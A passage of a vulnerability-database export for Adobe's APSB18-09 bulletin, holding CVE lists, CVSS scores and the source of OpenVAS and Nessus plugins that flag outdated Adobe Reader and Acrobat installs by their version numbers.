Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_reader_dc_classic_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/ReaderDC/Classic/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"15.0\", test_version2:\"15.006.30417\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4946", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", 
"CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813240", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813240", "type": "openvas", "title": "Adobe Reader DC (Classic Track) Security Updates (apsb18-09) - Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader DC (Classic Track) Security Updates (apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813240\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4946\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader DC (Classic Track) Security Updates (apsb18-09) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader DC\n 
(Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader DC (Classic Track)\n 2015.006.30418 and earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader DC (Classic Track) version\n 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_reader_dc_classic_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/ReaderDC/Classic/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"15.0\", test_version2:\"15.006.30417\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T01:14:42", "description": "The version of Adobe Reader installed on the remote Windows host is a\nversion prior to or equal to 2015.006.30417, 2017.011.30079, or\n2018.011.20038. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109896);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n 
script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a\nversion prior or equal to 2015.006.30417, 2017.011.30079, or\n2018.011.20038. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::adobe_reader::get_app_info();\nconstraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30417\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30079\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"15.7\", \"max_version\" : \"18.11.20038\", \"fixed_version\" : \"18.11.20040\" }\n];\n# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, \n# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:27:17", "description": "The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30419, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 30, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOSX_ADOBE_READER_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109898);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n 
\"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30419, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Reader\");\nbase_dir = app_info['path'] - \"/Applications\";\ntrack = get_kb_item(\"MacOSX/Adobe_Reader\"+base_dir+\"/Track\");\n\nif (!empty_or_null(track) && track == '2017')\n{\n constraints = [\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.11.30080\" }\n ];\n}\nelse\n{\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.11.20040\" }\n ];\n}\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:26:29", "description": "The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOSX_ADOBE_ACROBAT_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109897", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109897);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/22 9:47:13\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n 
\"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. 
It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\");\n\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.11.20040\" }\n ];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:54:57", "bulletinFamily": "info", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", 